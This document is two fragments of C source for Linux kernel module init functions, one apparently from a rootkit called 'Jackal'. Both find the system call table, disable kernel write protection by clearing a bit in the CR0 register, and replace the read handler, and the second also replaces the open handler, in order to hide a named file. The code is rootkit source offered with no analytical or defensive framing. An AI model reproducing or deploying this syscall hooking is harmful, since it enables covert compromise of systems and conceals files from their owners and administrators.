static int __init rootkit_start(void) { // Find the syscall table in memory if(!(sys_call_table = aquire_sys_call_table())) return -1; // record the initial value in the cr0 register original_cr0 = read_cr0(); // set the cr0 register to turn off write protection write_cr0(original_cr0 & ~0x00010000); // copy the old read call ref_sys_read = (void *)sys_call_table[__NR_read]; // write our modified read call to the syscall table sys_call_table[__NR_read] = (unsigned long *)new_sys_read; // turn memory protection back on write_cr0(original_cr0); return 0; }
static int __init jackle_start( void ) { printk( KERN_INFO "[+] J A C K A L\n" ); if( !( sys_call_table = aquire_sys_call_table() ) ) return -1; original_cr0 = read_cr0(); printk( KERN_INFO " |- Aquired sys_call_table\n" ); write_cr0( original_cr0 & ~0x00010000 ); printk( KERN_INFO " |- Unlocked table!!\n" ); ref_sys_read = ( void * )sys_call_table[__NR_read]; ref_sys_open = ( void * )sys_call_table[__NR_open]; sys_call_table[__NR_read] = ( unsigned long * )new_sys_read; printk( KERN_INFO " |- Patched sys_read\n" ); sys_call_table[__NR_open] = ( unsigned long * )new_sys_open; printk( KERN_INFO " |- Patched sys_open\n" ); printk( KERN_INFO " | ` hiding %s\n", file_to_hide ); write_cr0( original_cr0 ); return 0; }